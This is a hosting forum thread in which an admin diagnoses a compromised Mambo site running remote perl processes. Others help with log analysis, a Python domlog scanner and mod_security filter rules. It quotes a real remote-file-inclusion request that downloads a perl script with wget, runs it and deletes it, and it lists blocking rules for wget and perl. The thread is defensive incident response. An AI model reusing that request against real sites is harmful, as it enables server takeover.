sint19

Member
Feb 16, 2003
I have a lot of httpsl processes, about 50 at the same time.
Example of one of them:
[/proc/28899]# ls -al
total 0
dr-xr-xr-x 3 nobody nobody 0 Aug 7 19:04 ./
dr-xr-xr-x 1522 root root 0 Aug 6 00:31 ../
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cmdline
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cpu
lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 cwd -> //
-r-------- 1 nobody nobody 0 Aug 7 19:05 environ
lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 exe -> /usr/bin/perl*
dr-x------ 2 nobody nobody 0 Aug 7 19:05 fd/
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 maps
-rw------- 1 nobody nobody 0 Aug 7 19:05 mem
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 mounts
lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 root -> //
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 stat
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 statm
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 status

lsof -p 28899
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 28899 nobody cwd DIR 130,46 1024 456187906 /
perl 28899 nobody rtd DIR 130,46 1024 456187906 /
perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
perl 28899 nobody 1w FIFO 130,5 977102708 pipe
perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->rm43.1blu.de:8209 (ESTABLISHED)
perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
perl 28899 nobody 5u unix 0x248a2760 976881059 socket
perl 28899 nobody 15w REG 130,46 0 689897478 /usr/local/apache/logs/audit_log
perl 28899 nobody 16w REG 130,46 0 689897485 /usr/local/apache/logs/modsec_debug_log
perl 28899 nobody 17w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
... a lot of domlogs

For CWD (current working folder) I have only '/'.
cat environ - there is nothing.
Any idea how to stop this? (Blocking the rm43.1blu.de IP will not solve the problem.)

thanks

chirpy

Well-Known Member
Verified Vendor
Jun 15, 2002
Go on, have a guess
Looks like a perl script being run through a compromised PHP script. You're going to have to wade through your domlogs to track it down.

sint19

Member
Feb 16, 2003
Bingo

Thank you, I found it, but I still don't know the best way to stop this.

203.113.132.116 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/webdesign/images/CISLA/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/webdesign/images/CISla/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"

The exploit uses Mambo's ''mosConfig_absolute_path''.
The exploit copies the mambo.txt perl script to /tmp, executes it, and deletes it.
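Wading through the domlogs for requests like the one above can be scripted. The following is an added example, not code from the thread: it parses Apache combined-format lines, URL-decodes each query parameter, and flags the two things that make this request an attack, a parameter whose value is a remote URL (the mosConfig_absolute_path include) and shell commands such as wget, perl and rm -rf carried in a parameter. The sample log lines are constructed, with the attacker host replaced by the placeholder example.invalid.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined-format line as written to cPanel domlogs; only the request target is inspected.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) (?P<size>\S+)')
# A parameter whose value is itself a URL is the remote-include pattern (mosConfig_absolute_path=http://...).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shell payload markers seen in the thread's log line: cd /tmp, wget, "perl <file>", rm -rf.
CMD_MARKERS = [
    ("cd-tmp", re.compile(r'\bcd\s+/tmp\b')),
    ("wget", re.compile(r'\bwget\b')),
    ("perl-exec", re.compile(r'\bperl\s+\S')),
    ("rm-rf", re.compile(r'\brm\s+-rf\b')),
]

def analyze_target(target):
    """Return the set of indicator names found in one request target, empty if none."""
    reasons = set()
    query = urlsplit(target).query
    for pair in query.split("&"):          # split before decoding so an encoded & inside a value is not a separator
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)
        if REMOTE_URL_RE.match(value):
            reasons.add(f"remote-include:{name}")
        for label, rx in CMD_MARKERS:
            if rx.search(value):
                reasons.add(f"{label}:{name}")
    return reasons

def scan_log(lines):
    """Return a list of (ip, timestamp, status, sorted reasons) for each suspicious access-log line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyze_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), m.group("status"), sorted(reasons)))
    return hits

# Constructed sample: one benign Mambo request and one modelled on the thread's attack line.
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Aug/2006:01:50:02 +0200] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&'
    'mosConfig_absolute_path=http://example.invalid/tool.gif?&cmd=cd%20/tmp/;wget%20http://example.invalid/m.txt;'
    'perl%20m.txt;rm%20-rf%20m.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"',
]
```

Run scan_log over the lines of each domlog; a 200 status on a flagged line, as in the thread, means the request reached the script and the host should be treated as compromised.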

HostMerit

Well-Known Member
Oct 24, 2004
New Jersey, USA
cPanel Access Level: DataCenter Provider
Install mod_security through WHM -> Addon Scripts, then add rules to /usr/local/apache/conf/modsec.user.conf, such as:

SecFilter "mosConfig_absolute_path"
SecFilter "wget"
SecFilter "com_content"
SecFilter "perl\x20"

Those will easily block the widespread exploit / worm.

HostMerit

Well-Known Member
Oct 24, 2004
New Jersey, USA
cPanel Access Level: DataCenter Provider
Also run killall -9 perl;killall -9 httpd;httpd stop;httpd startssl

That will clear any old processes or running exploits, and restart Apache fresh after you've installed mod_security and applied the necessary patches.

In the meantime, chmod 700 /usr/bin/wget ASAP to avoid further exploitation.

sint19

Member
Feb 16, 2003
All done

except
SecFilter "com_content"

It is needed for running Mambo, but

SecFilter "mosConfig_absolute_path"
SecFilter "wget"

do a great job (HTTP Error 406 - Not Acceptable).

Thank you

HostMerit

Well-Known Member
Oct 24, 2004
New Jersey, USA
cPanel Access Level: DataCenter Provider
I would also suggest SecFilter "perl\x20"

As that is "perl " and will be used in almost any exploit to run any file. It's better to be safe.

Also you can use my version at http://www.hostmerit.com/modsec.user.conf

It's highly recommended by many users of the cPanel forums, as I code it myself and update it A LOT; it was also recommended directly by cPanel in a presentation on security at HostingCon. :p :p